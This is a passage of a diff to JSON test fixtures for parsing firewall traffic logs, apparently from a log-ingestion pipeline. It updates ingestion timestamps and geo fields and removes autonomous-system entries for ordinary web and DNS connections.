"number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9753,7 +9403,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381980600Z", + "ingested": "2021-12-14T14:50:18.748419078Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9778,26 +9428,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9893,7 +9538,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381985900Z", + "ingested": "2021-12-14T14:50:18.748419428Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9918,26 +9563,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10033,7 +9673,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381991100Z", + "ingested": "2021-12-14T14:50:18.748419776Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10058,26 +9698,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10173,7 +9808,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381996500Z", + "ingested": "2021-12-14T14:50:18.748420117Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10198,26 +9833,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 26786, - "ip": "175.16.199.1", - "packets": 22 + "packets": 22, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10313,7 +9943,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382001800Z", + "ingested": "2021-12-14T14:50:18.748420478Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10338,26 +9968,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10453,7 +10078,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382007400Z", + "ingested": "2021-12-14T14:50:18.748420962Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10478,26 +10103,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10593,7 +10213,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382012700Z", + "ingested": "2021-12-14T14:50:18.748421301Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10618,26 +10238,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10733,7 +10348,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382018100Z", + "ingested": "2021-12-14T14:50:18.748421643Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10858,7 +10473,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382023400Z", + "ingested": "2021-12-14T14:50:18.748421989Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10883,26 +10498,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 9064, - "ip": "175.16.199.1", - "packets": 9 + "packets": 9, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10998,7 +10608,7 @@ }, "event": { "duration": 3000000000, - "ingested": "2021-12-09T13:43:22.382028700Z", + "ingested": "2021-12-14T14:50:18.748422342Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11023,26 +10633,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 9124, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11138,7 +10743,7 @@ }, "event": { "duration": 7000000000, - "ingested": "2021-12-09T13:43:22.382033900Z", + "ingested": "2021-12-14T14:50:18.748422688Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11263,7 +10868,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382039300Z", + "ingested": "2021-12-14T14:50:18.748423046Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11388,7 +10993,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382044500Z", + "ingested": "2021-12-14T14:50:18.748423389Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11413,26 +11018,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11528,7 +11128,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382075200Z", + "ingested": "2021-12-14T14:50:18.748423747Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11553,26 +11153,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11668,7 +11263,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382078800Z", + "ingested": "2021-12-14T14:50:18.748424095Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11693,26 +11288,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11808,7 +11398,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382082100Z", + "ingested": "2021-12-14T14:50:18.748424445Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11833,26 +11423,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -11948,7 +11533,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382086400Z", + "ingested": "2021-12-14T14:50:18.748424793Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11973,26 +11558,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12088,7 +11668,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382091900Z", + "ingested": "2021-12-14T14:50:18.748425139Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12213,7 +11793,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.382096200Z", + "ingested": "2021-12-14T14:50:18.748425483Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12238,26 +11818,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12353,7 +11928,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382100100Z", + "ingested": "2021-12-14T14:50:18.748425836Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12378,26 +11953,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12493,7 +12063,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382103400Z", + "ingested": "2021-12-14T14:50:18.748426188Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12518,26 +12088,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12633,7 +12198,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382107500Z", + "ingested": "2021-12-14T14:50:18.748426535Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12658,26 +12223,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12773,7 +12333,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382113200Z", + "ingested": "2021-12-14T14:50:18.748426881Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12798,26 +12358,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 906, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -12913,7 +12468,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.382118600Z", + "ingested": "2021-12-14T14:50:18.748427241Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12938,26 +12493,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -13053,7 +12603,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382123900Z", + "ingested": "2021-12-14T14:50:18.748427588Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13078,26 +12628,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": 